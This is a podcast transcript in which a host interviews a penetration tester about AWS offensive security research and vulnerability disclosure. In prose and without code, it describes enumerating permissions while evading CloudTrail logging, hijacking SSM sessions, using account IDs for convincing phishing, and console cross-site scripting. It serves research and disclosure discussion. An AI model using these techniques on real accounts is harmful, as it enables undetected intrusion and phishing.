Episode Transcript
Available transcripts are automatically generated. Complete accuracy is not guaranteed.
(00:00):
From my own personal perspective, I always think it’s
(00:02):
best to contact the developers, or the company, or
whoever maintains whatever you found a vulnerability in.
Welcome to Screaming in the Cloud.
I’m Corey Quinn.
I spend a lot of time throwing things at AWS in varying capacities.
One area I don’t spend a lot of time giving them grief is in the
(00:24):
InfoSec world because as it turns out, they—and almost everyone
else—doesn’t have much of a sense of humor around things like security.
My guest today is Nick Frechette, who’s a
penetration tester and team lead for State Farm.
Nick, thanks for joining me.
Hey, thank you for inviting me on.
This episode is sponsored in part by my day job, the Duckbill Group.
(00:47):
Do you have a horrifying AWS bill?
That can mean a lot of things.
Predicting what it's going to be.
Determining what it should be.
Negotiating your next long term contract with AWS.
Or just figuring out why it increasingly resembles a
phone number, but nobody seems to quite know why that is.
To learn more, visit duckbillgroup.com.
(01:08):
Remember, you can't duck the duck bill, Bill.
And my CEO informs me that is absolutely not our slogan.
So, like most folks in InfoSec, you tend to have a bunch of different,
I guess, titles or roles that hang on signs around someone’s neck.
And it all sort of distills down, on some level—in your
case, at least, and please correct me if I’m wrong—to
‘cloud security researcher.’ Is that roughly correct?
(01:31):
Or am I missing something fundamental?
Yeah.
So, for my day job, I do penetration testing, and that kind of
puts me up against a variety of things, from web applications,
to client-side applications, to sometimes the cloud.
In my free time, though, I like to spend a lot of time on security
research, and most recently been focusing pretty heavily on AWS.
(01:52):
So, let’s start at the very beginning.
What is a cloud security researcher?
“What is it you’d say it is you do here?” For lack of a better phrasing?
Well, to be honest, the phrase ‘security researcher’ or ‘cloud security
researcher’ has been, kind of… I guess watered down in recent years;
everybody likes to call themselves a researcher in some way or another.
(02:13):
You have some folks who participate in the bug bounty programs.
So, for example, GCP, and Azure have their own bug bounties.
AWS does not, and too sure why.
And so they want to find vulnerabilities with the
intention of getting cash compensation for it.
You have other folks who are interested in doing security research to try and
better improve defenses and alerting and monitoring so that when the next major
(02:38):
breach happens, they’re prepared or they’ll be able to stop it ahead of time.
From what I do, I’m very interested in offensive security research.
So, how can I as, a penetration tester, or red teamer or, I guess,
an actual criminal, [laugh] how can I take advantage of AWS, or
try to avoid detection from services like GuardDuty and CloudTrail?
(02:59):
So, let’s break that down a little bit further.
I’ve heard the term of ‘red team versus blue team’ used before.
Red team—presumably—is the offensive security folks—and yes, some of those
people are, in fact, quite offensive—and blue team is the defense side.
In other words, keeping folks out.
Is that a reasonable summation of the state of the world?
It can be, yeah, especially when it comes to security.
(03:20):
One of the nice parts about the whole InfoSec field—I know a lot of folks tend
to kind of just say, “Oh, they’re there to prevent the next breach,” but in
reality, InfoSec has a ton of different niches and different job specialties.
“Blue teamers,” quote-unquote, tend to be the defense side working on
ensuring that we can alert and monitor potential attacks, whereas red
(03:41):
teamers—or penetration testers—tend to be the folks who are trying to do
the actual exploitation or develop techniques to do that in the future.
So, you talk a bit about what you do for work, obviously,
but what really drew my notice was stuff you do that
isn’t part of your core job, as best I understand it.
You’re focused on vulnerability research, specifically with a strong
(04:03):
emphasis on cloud exploitation, as you said—AWS in particular—and you’re
the founder of Hacking the Cloud, which is an open-source encyclopedia
of various attacks and techniques you can perform in cloud environments.
Tell me about that.
Yeah, so Hacking the Cloud came out of a frustration I had when I was
first getting into AWS, that there didn’t seem to be a ton of good
(04:28):
resources for offensive security professionals to get engaged in the cloud.
By comparison, if you wanted to learn about web application
hacking, or attacking Active Directory, or reverse engineering,
if you have a credit card, I can point you in the right direction.
But there just didn’t seem to be a good course or introduction
(04:49):
to how you, as a penetration tester, should attack AWS.
There’s things like, you know, open S3 buckets are a nightmare,
or that server-side request forgery on an EC2 instance can
result in your organization being fined very, very heavily.
I kind of wanted to go deeper with that.
And with Hacking the Cloud, I’ve tried to gather a bunch of
(05:10):
offensive security research from various blog posts and conference
talks into a single location, so that both the offense side and
the defense side can kind of learn from it and leverage that to
either improve defenses or look for things that they can attack.
It seems to me that doing things like that is not likely to wind up
making a whole heck of a lot of friends over on the cloud provider side.
(05:33):
Can you talk a little bit about how what you do
is perceived by the companies you’re focusing on?
Yeah.
So, in terms of relationship, I don’t really
have too much of an idea of what they think.
I have done some research and written on my blog, as well
as published to Hacking the Cloud, some techniques for doing
things like abusing the SSM agent, as well as abusing the AWS
(05:58):
API to enumerate permissions without logging into CloudTrail.
And ironically, through the power of IP addresses, I can see
when folks from the Amazon corporate IP address space look at
my blog, and that’s always fun, especially when there’s, like,
four in the course of a couple of minutes, or five or six.
But I don’t really know too much about what they—or how
they view it, or if they think it’s valuable at all.
(06:20):
I hope they do, but really not too sure.
I would imagine that they do, on some level, but I guess the big question
is, you know that someone doesn’t like what you’re doing when they send,
you know, cease and desist notices, or have the police knock on your door.
I feel like at most levels, we’re past that in an
InfoSec level, at least I’d like to believe we are.
We don’t hear about that happening all too often anymore.
(06:42):
But what’s your take on it?
Yeah, I definitely agree.
I definitely think we are beyond that.
Most companies these days know that vulnerabilities are going
to happen, no matter how hard you try and how much money you
spend, and so it’s better to be accepting of that and open to it.
And especially because the InfoSec community can be so, say,
noisy at times, it’s definitely worth it to pay attention,
(07:05):
definitely be appreciative of the information that may come out.
AWS is pretty awesome to work with, having
disclosed to them a couple times, now.
They have a safe harbor provision, which essentially says that so long as
you’re operating in good faith, you are allowed to do security testing.
They do have some rules around that, but they are pretty clear in terms of if
(07:26):
you were operating in good faith, you wouldn’t be doing anything like that.
It tends to be pretty obviously malicious things that they’ll ask you to stop.
So, talk to me a little bit about what
you’ve found lately, and been public about.
There have been a number of examples that have come up whenever
people start googling your name or looking at things you’ve done.
But what’s happening lately?
(07:46):
What have you found that’s
interesting?
Yeah.
So, I think most recently, the thing that’s kind of gotten the most
attention has been a really interesting bug I found in the AWS API.
Essentially, kind of the core of it is that when you are interacting with the
API, obviously that gets logged to CloudTrail, so long as it’s compatible.
So, if you are successful, say you want to do, like,
(08:09):
Secrets Manager, ListSecrets, that shows up in CloudTrail.
And similarly, if you do not have that permission on a role or user and
you try to do it, that access denied also gets logged to CloudTrail.
Something kind of interesting that I found is that by manually
modifying a request, or mal-forming them, what we can do
is we can modify the content-type header, and as a result
(08:31):
when you do that—and you can provide literally gibberish.
I think I have VS Code window here somewhere with a content-type of
‘meow’—when you do that, the AWS API knows the action that you’re trying to
call because of that messed up content type, it doesn’t know exactly what
you’re trying to do and as a result, it doesn’t get logged to CloudTrail.
Now, while that may seem kind of weirdly specific and not
(08:52):
really, like, a concern, the nice part of it though is that
for some API actions—somewhere in the neighborhood of 600.
I say ‘in the neighborhood of’ just because it fluctuates over
time—as a result of that, you can tell if you have that permission,
or if you don’t without that being logged to CloudTrail.
And so we can do this enumeration of permissions
(09:14):
without somebody in the defense side seeing us do it.
Which is pretty awesome from a offensive security perspective.
On some level, it would be easy to say, “Well, just not showing up
in the logs isn’t really a security problem at all.” I guess that you
disagree?
I do, yeah.
So, let’s sort of look at it from a real-world perspective.
Let’s say, Corey, you’re tired of saving people money on their AWS
(09:37):
bill, you’d instead maybe want to make a little money on the side and
you’re okay with perhaps, you know, committing some crimes to do it.
Through some means you get access to a company’s AWS credentials for
some particular role, whether that’s through remote code execution
on an EC2 instance, or maybe find them in an open location like
an S3 bucket or a Git repository, or maybe you phish a developer,
(10:01):
through some means, you have an access key and a secret access key.
The new problem that you have is that you don’t know what those
credentials are associated with, or what permissions they have.
They could be the root account keys, or they could be
literally locked down to a single S3 bucket to read from.
It all just kind of depends.
Now, historically, your options for figuring that out are kind of limited.
(10:25):
Your best bet would be to brute-force the AWS API using a tool like
Pacu, or my personal favorite, which is enumerate-iam by Andres Riancho.
And what that does is it just tries a bunch of API
calls and sees which one works and which one doesn’t.
And if it works, you clearly know that you have that permission.
Now, the problem with that, though, is that if you were to do
(10:46):
that, that’s going to light up CloudTrail like a Christmas tree.
It’s going to start showing all these access denieds
for these various API calls that you’ve tried.
And obviously, any defender who’s paying
attention is going to look at that and go, “Okay.
That’s, uh, that’s suspicious,” and you’re
going to get shut down pretty quickly.
What’s nice about this bug that I found is that instead of having to litter
CloudTrail with all these logs, we can just do this enumeration for roughly
(11:10):
600-ish API actions across roughly 40 AWS services, and nobody is the wiser.
You can enumerate those permissions, and if they work fantastic, and
you can then use them, and if you come to find you don’t have any
of those 600 permissions, okay, then you can decide on where to go
from there, or maybe try to risk things showing up in CloudTrail.
(11:30):
CloudTrail is one of those services that I find
incredibly useful, or at least I do in theory.
In practice, it seems that things don’t show up there, and you don’t
realize that those types of activities are not being recorded until
one day there’s an announcement of, “Hey, that type of activity
is now recorded.” As of the time of this recording, the most
recent example that in memory is data plane requests to DynamoDB.
(11:51):
It’s, “Wait a minute.
You mean that wasn’t being recorded previously?
Huh.
I guess it makes sense, but oh, dear.”
And that causes a reevaluation of what’s happening in the—from
a security policy and posture perspective for some clients.
There’s also, of course, the challenge of CloudTrail
logs take a significant amount of time to show up.
It used to be over 20 minutes, I believe now it’s
(12:12):
closer to 15—but don’t quote me on that, obviously.
Run your own tests—which seems awfully slow for anything that’s
going to be looking at those in an automated fashion and taking
a reactive or remediation approach to things that show up there.
Am I missing something key?
No, I think that is pretty spot on.
And believe me, [laugh] I am fully aware at how long
CloudTrail takes to populate, especially with doing a bunch
(12:35):
of research on what is and what is not logged to CloudTrail.
I know that there are some operations that can be
logged more quickly than the 15-minute average.
Off the top of my head, though, I actually don’t quite remember what those are.
But you’re right, in general, the majority at least do take quite a while.
And that’s definitely time in which an adversary or someone like me,
(12:55):
could maybe take advantage of that 15-minute window to try and brute
force those permissions, see what we have access to, and then try
to operate and get out with whatever goodies we’ve managed to steal.
Let’s say that you’re doing the thing that you do, however
that comes to be—and I am curious—actually, we’ll start there.
I am curious; how do you discover these things?
Is it looking at what is presented and then figuring out,
(13:19):
“Huh, how can I wind up subverting the system it’s based on?”
And, similar to the way that I take a look at any random AWS
services and try and figure out how to use it as a database?
How do you find these things?
Yeah, so to be honest, it all kind of depends.
Sometimes it’s completely by accident.
So, for example, the API bug I described about not logging to
CloudTrail, I actually found that due to [laugh] copy and pasting
(13:41):
code from AWS’s website, and I didn’t change the content-type header.
And as a result, I happened to notice this weird
behavior, and kind of took advantage of it.
Other times, it’s thinking a little bit about how something
is implemented and the security ramifications of it.
So, for example, the SSM agent—which is a phenomenal tool in order
to do remote access on your EC2 instances—I was sitting there one day
(14:05):
and just kind of thought, “Hey, how does that authenticate exactly?
And what can I do with it?” Sure enough, it authenticates the exact same way
that the AWS API does, that being the metadata service on the EC2 instance.
And so what I figured out pretty quickly is if you can get access
to an EC2 instance, even as a low-privilege user or you can do
(14:26):
server-side request forgery to get the keys, or if you just have
sufficient permissions within the account, you can potentially intercept
SSM messages from, like, a session and provide your own results.
And so in effect, if you’ve compromised an EC2 instance, and the only
way, say, incident response has into that box is SSM, you can effectively
(14:47):
lock them out of it and, kind of, do whatever you want in the meantime.
That seems like it’s something of a problem.
It definitely can be.
But it is a lot of fun to play keep-away with incident response.
[laugh]
. I’d like to reiterate that this is all in environments
you control and have permissions to be operating within.
It is not recommended that people pursue things like this
(15:07):
in other people’s cloud environments without permissions.
I don’t want to find us sued for giving crap advice, and I
don’t want to find listeners getting arrested because they
didn’t understand the nuances of what we’re talking about.
Yes, absolutely.
Getting legal approval is really important for
any kind of penetration testing or red teaming.
I know some folks sometimes might get carried away, but definitely
(15:28):
be sure to get approval before you do any kind of testing.
So, how does someone report a vulnerability to a company like AWS?
So AWS, at least publicly, doesn’t have any kind of bug bounty program.
But what they do have is a vulnerability disclosure program.
And that is essentially an email address that you can
contact and send information to, and that’ll act as your
(15:50):
point of contact with AWS while they investigate the issue.
And at the end of their investigation, they can report back with
their findings, whether they agree with you and they are working to
get that patched or fixed immediately, or if they disagree with you
and think that everything is hunky-dory, or if you may be mistaken.
I saw a tweet the other day that I would love to get your thoughts
(16:10):
on, which said effectively, that if you don’t have a public
bug bounty program, then any way that a researcher chooses to
disclose the vulnerability is definitionally responsible on their
part because they don’t owe you any particular duty of care.
Responsible disclosure, of course, is also referred to
(16:31):
as, “Coordinated vulnerability disclosure” because we’re
always trying to reinvent terminology in this space.
What do you think about that?
Is there a duty of care from security researchers to responsibly disclose
the vulnerabilities they find, or coordinate those vulnerabilities with
vendors in the absence of a public bounty program on turning those things in?
(16:51):
Yeah, you know, I think that’s a really difficult question to answer.
From my own personal perspective, I always think it’s best to contact
the developers, or the company, or whoever maintains whatever you found
a vulnerability in, give them the best shot to have it fixed or repaired.
Obviously, sometimes that works great, and the company is
super receptive, and they’re willing to patch it immediately.
(17:13):
And other times, they just don’t respond, or sometimes they respond
harshly, and so depending on the situation, it may be better for you to
release it publicly with the intention that you’re informing folks that
this particular company or this particular project may have an issue.
On the flip side, I can kind of understand—although I don’t necessarily
(17:34):
condone it—why folks pursue things like exploit brokers, for example.
So, if a company doesn’t have a bug bounty program, and the
researcher isn’t expecting any kind of, like, cash compensation, I
can understand why they may spend tens of hours, maybe hundreds of
hours chasing down a particularly impactful vulnerability, only to
(17:54):
maybe write a blog post about it or get a little head pat and say,
“Thanks, nice work.” And so I can see why they may pursue things like
selling to an exploit broker who may pay them hefty sum, if it is a—
Orders of magnitude more.
It’s, “Oh, good.
You found a way to remotely execute code across all of EC2 in every
region”—that is a hypothetical; don’t email me—have a t-shirt.
(18:16):
It seems like you could basically buy all the t-shirts
for [laugh] what that is worth on the export market.
Yes, absolutely.
And I do know from some experience that folks will reach out to
you and are interested in, particularly, some cloud exploits.
Nothing, like, minor, like some of the things that I’ve found, but more
thinking more of, like, accessing resources without anybody knowing or
(18:37):
accessing resources cross-account; that could go for quite a hefty sum.
Here at the Duckbill Group, one of the things we do with,
you know, my day job, is we help negotiate AWS contracts.
We just recently crossed five billion dollars of contract value negotiated.
It solves for fun problems such as how do you know that your
(18:58):
contract that you have with AWS is the best deal you can get?
How do you know you're not leaving money on the table?
How do you know that you're not doing what I do on this podcast
and on Twitter constantly and sticking your foot in your mouth?
To learn more, come chat at duckbillgroup.com.
Optionally, I will also do podcast voice when we talk about it.
(19:21):
Again, that's duckbillgroup.com.
It always feels squicky, on some level, to discover something like this that’s
kind of neat, and wind up selling it to basically some arguably terrible people.
Maybe.
We don’t know who’s buying these things from the exploit broker.
Counterpoint, having reported a few security problems myself to various
providers, you get an autoresponder, then you get a thank you email that goes
(19:46):
into a bit more detail—for the well-run programs, at least—and invariably, the
company’s position is, is whatever you found is not as big of a deal as you
think it is, and therefore they see no reason to publish it or go loud with it.
Wouldn’t you agree?
Because, on some level, their entire position is, please don’t talk about
any security shortcomings that you may have discovered in our system.
(20:08):
And I get why they don’t want that going loud, but by the same token,
security researchers need a reputation to continue operating on some level
in the market as security researchers, especially independents, especially
people who are trying to make names for themselves in the first place.
Yeah.
How do you resolve that dichotomy yourself?
Yeah, so, from my perspective, I totally understand why a company
(20:32):
or project wouldn’t want you to publicly disclose an issue.
Everybody wants to look good, and nobody wants to be called out for
any kind of issue that may have been unintentionally introduced.
I think the thing at the end of the day, though, from my perspective, if I,
as some random guy in the middle of nowhere Illinois finds a bug, or to be
frank, if anybody out there finds a vulnerability in something, then a much
(20:54):
more sophisticated adversary is equally capable of finding such a thing.
And so it’s better to have these things out in the open and discussed,
rather than hidden away, so that we have the best chance of anybody being
able to defend against it or develop detections for it, rather than just
kind of being like, “Okay, the vendor didn’t like what I had to say,
(21:15):
I guess I’ll go back to doing whatever [laugh] things I normally do.”
You’ve obviously been doing this for a while.
And I’m going to guess that your entire
security researcher career has not been focused
on cloud environments in general and AWS in particular.
Yes, I’ve done some other stuff in relation to abusing GitLab Runners.
I also happen to find a pretty neat RCE and privilege
(21:36):
escalation in the very popular open-source project.
Pi-hole.
Not sure if you have any experience with that.
Oh, I run it myself all the time for various DNS
blocking purposes and other sundry bits of nonsense.
Oh, yes, good.
But what I’m trying to establish here is that this is
not just one or two companies that you’ve worked with.
You’ve done this across the board, which means I can ask a
question without naming and shaming anyone, even implicitly.
(21:58):
What differentiates good vulnerability disclosure programs from terrible ones?
Yeah, I think the major differentiator is the reactivity
of the project, as in how quickly they respond to you.
There are some programs I’ve worked with where you disclose something,
maybe even that might be of a high severity, and you might not hear back
(22:18):
four weeks at a time, whereas there are other programs, particularly the
MSRC—which is a part of Microsoft—or with AWS’s disclosure program, where
within the hour, I had a receipt of, “Hey, we received this, we’re looking
into it.” And then within a couple hours after that, “Yep, we verified it.
We see what you’re seeing, and we’re going to look at it right away.” I
think that’s definitely one of the major differentiators for programs.
(22:42):
Are there any companies you’d like to call out in either
direction—and, “No,” is a perfectly valid [laugh] answer to this
one—for having excellent disclosure programs versus terrible ones?
I don’t know if I’d like to call anybody out negatively.
But in support, I have definitely appreciated working with both AWS’s and
the MSRC—Microsoft’s—I think both of them have done a pretty fantastic job.
(23:03):
And they definitely know what they’re doing at this point.
Yeah, I must say that I primarily focus on AWS and have for a
while, which should be blindingly obvious to anyone who’s listened
to me talk about computers for more than three and a half minutes.
But my experiences with the security folks at AWS have been uniformly
positive, even when I find things that they don’t want me talking
about, that I will be talking about regardless, they’ve always
(23:26):
been extremely respectful, and I have never walked away from the
conversation thinking that I was somehow cheated by the experience.
In fact, a couple of years ago at the last in-person re:Invent, I
got to give a talk around something I reported specifically about
how AWS runs its vulnerability disclosure program with one of their
security engineers, Zach Glick, and he was phenomenally transparent
(23:50):
around how a lot of these things work, and what they care about,
and how they view these things, and what their incentives are.
And obviously being empathetic to people reporting things in with
the understanding that there is no duty of care that when security
researchers discover something, they then must immediately go
and report it in return for a pat on the head and a thank you.
It was really neat being able to see both
(24:12):
sides simultaneously around a particular issue.
I’d recommend it to other folks, except I don’t
know how you make that lightning strike twice.
It’s very, very wise.
Yes.
Thank you.
I do my best.
So, what’s next for you?
You’ve obviously found a number of interesting
vulnerabilities around information disclosure.
One of the more recent things that I found that was sort of neat as I trolled
(24:32):
the internet—I don’t believe it was yours, but there was a ability to determine
the account ID that owned an S3 bucket by enumerating by a binary search.
Did you catch that at all?
I did.
That was by Ben Bridts, which is—it’s pretty awesome technique, and
that’s been something I’ve been kind of interested in for a while.
There is an ability to enumerate users’ roles and service-linked
(24:55):
roles inside an account, so long as the account ID.
The problem, of course, is getting the account ID.
So, when Ben put that out there I was super stoked about being able to
leverage that now for enumeration and maybe some fun phishing tricks with that.
I love the idea.
I love seeing that sort of thing being conducted.
And AWS’s official policy as best I remember when I looked
(25:17):
at this once, account IDs are not considered confidential.
Do you agree with that?
Yep.
That is my understanding of how AWS views it.
From my perspective, having an account ID can be beneficial.
I mentioned that you can enumerate users’ roles and service-linked
roles with it, and that can be super useful from a phishing perspective.
(25:38):
The average phishing email looks like, “Oh, you won an iPad,” or, “Oh,
you’re the 100th visitor of some website,” or something like that.
But imagine getting an email that looks like it’s from something like AWS
developer support, or from some research program that they’re doing, and
they can say to you, like, “Hey, we see that you have these roles in your
(25:59):
account with account ID such-and-such, and we know that you’re using EKS,
and you’re using ECS,” that phishing email becomes a lot more believable
when suddenly this outside party seemingly knows so much about your account.
And that might be something that you would think, “Oh, well only a
real AWS employee or AWS would know that.” So, from my perspective,
I think it’s best to try and keep your account ID secret.
(26:23):
I actually redact it from every screenshot
that I publish, or at the very least, I try to.
At the same time, though, it’s not the kind of thing that’s
going to get somebody in your account in a single step, so I
can totally see why some folks aren’t too concerned about it.
I feel like we also got a bit of a red herring coming from AWS
blog posts themselves, where they always will give screenshots
(26:44):
explaining what they do, and redact the account ID in every case.
And the reason that I was told at one point was, “Oh, we
have an internal provisioning system that’s different.
It looks different, and I don’t want to confuse people whenever I
wind up doing a screenshot.” And that’s great, and I appreciate that.
And part of me wonders on one level how accurate is that?
(27:05):
Because sure, I understand that you don’t necessarily want to
distract people with something that looks different, but then I
found out that the system is called Isengard and, yeah, it’s great.
They’ve mentioned it periodically in blog posts, and talks, and the rest.
And part of me now wonders, oh, wait a minute.
Is it actually because they don’t want to disclose the differences
between those systems, or is it because they don’t have license
(27:25):
rights publicly to use the word Isengard and don’t want to get
sued by whoever owns the rights to the Lord of the Rings trilogy.
So, one wonders what the real incentives are in different cases.
But I’ve always viewed account IDs as being the sort of
thing that eh, you probably want to share them around
all the time, but it also doesn’t necessarily hurt.
Exactly, yeah.
It’s not the kind of thing you want to share with the
(27:46):
world immediately, but it doesn’t really hurt in the end.
There was an early time when the partner network was effectively determining
tiers of partner by how much spend they influenced, and the way that you’ve
demonstrated that was by giving account IDs for your client accounts.
The only verification at the time, to my understanding was that,
“Yep, that mapped to the client you said it did.” And that was it.
(28:08):
So, I can understand back in those days not wanting to muddy those waters.
But those days are also long passed.
So, I get it.
I’m not going to be the first person to advertise mine, but if you can discover
my account ID by looking at a bucket, it doesn’t really keep me up at night.
So, all of those things considered, we’ve had a pretty
wide-ranging conversation here about a variety of things.
(28:29):
What’s next?
What interests you as far as where you’re going to start looking and
exploring—and exploiting as the case may be—various cloud services?
hackthe.cloud—which there is the dot in there, which also turns it into a
domain; excellent choice—is absolutely going to be a great collection for a lot
(28:49):
of what you find and for other people to contribute and learn from one another.
But where are you aimed at?
What’s next?
Yeah, so one thing I’ve been really interested in has been fuzzing the AWS API.
As anyone who’s ever used AWS before knows, there are hundreds
of services with thousands of potential API endpoints.
And so from a fuzzing perspective, there is a wide variety of things
(29:11):
for us to potentially affect or potentially find vulnerabilities in.
I’m currently working on a library that will
allow me to make that fuzzing a lot easier.
You could use things like botocore, Boto3, like, some of the AWS SDKs.
The problem though, is that those are designed for, sort of like, the
happy path where you can format your request the way Amazon wants.
(29:33):
As a security researcher or as someone doing fuzzing, I kind of want
to send random gibberish sometimes, or I want to malform my requests.
And so that library is still in production,
but it has already resulted in a bug.
While I was fuzzing part of the AWS API, I happened to notice that
I broke Elastic Beanstalk—quite literally—when [laugh] when I was
going through the AWS console, I got the big red error message of,
(29:56):
“ [unintelligible] that request parameter is null.” And I was like, “Huh.
Well, why is it null?”
And come to find out as a result of that, there is a HTML injection
vulnerability in the Elastic—well, there was a HTML injection
vulnerability in the Elastic Beanstalk, for the AWS console.
Pivoting from there, the Elastic Beanstalk uses
Angular 1.8.1, or at least it did when I found it.
(30:17):
As a result of that, we can modify that HTML injection to do template injection.
And for the AngularJS crowd, template injection is basically cross-site
scripting [laugh] because there is no sandbox anymore, at least in that version.
And so as a result of that, I was able to get cross-site
scripting in the AWS console, which is pretty exciting.
That doesn’t tend to happen too frequently.
(30:38):
No that is not a typical issue that winds up getting disclosed very often.
Definitely, yeah.
And so I was excited about it, and considering the fact that my library
for fuzzing is literally, like, not even halfway done, or is barely
halfway done, I’m looking forward to what other things I can find with it.
I look forward to reading more.
And at the time of this recording, I should point out
(30:59):
that this has not been finalized or made public, so I’ll
be keeping my eyes open to see what happens with this.
And hopefully, this will be old news by the time this episode drops.
If not, well, [laugh] this might be an interesting episode once it goes out.
Yeah.
I hope they’d have it fixed by then.
They haven’t responded to it yet other than the, “Hi, we’ve received your email.
(31:21):
Thanks for checking in.” But we’ll see how that goes.
Watching news as it breaks is always exciting.
If people want to learn more about what you’re up to,
and how you go about things, where can they find you?
Yeah, so you can find me at a couple different places.
On Twitter I’m @frichette_n.
I also write a blog where I contribute a lot of my
research at frechetten.com as well as Hacking the Cloud.
(31:43):
I contribute a lot of the AWS stuff that gets thrown on there.
And it’s also open-source, so if anyone else would like to contribute
or share their knowledge, you’re absolutely welcome to do so.
Pull requests are open and excited for anyone to contribute.
Excellent.
And we will of course include links to that in the [show
notes] . Thank you so much for taking the time to speak with me.
I really appreciate it.
Yeah, thank you so much for inviting me on.
(32:04):
I had a great time.
Nick Frechette, penetration tester and team lead for State Farm.
I’m Cloud Economist Corey Quinn, and this is Screaming in the Cloud.
If you’ve enjoyed this podcast, please leave a five-star review on
your podcast platform of choice, whereas if you’ve hated this podcast,
please leave a five-star review on your podcast platform of choice,
along with a comment telling me why none of these things are actually
(32:25):
vulnerabilities, but simultaneously should not be discussed in public, ever.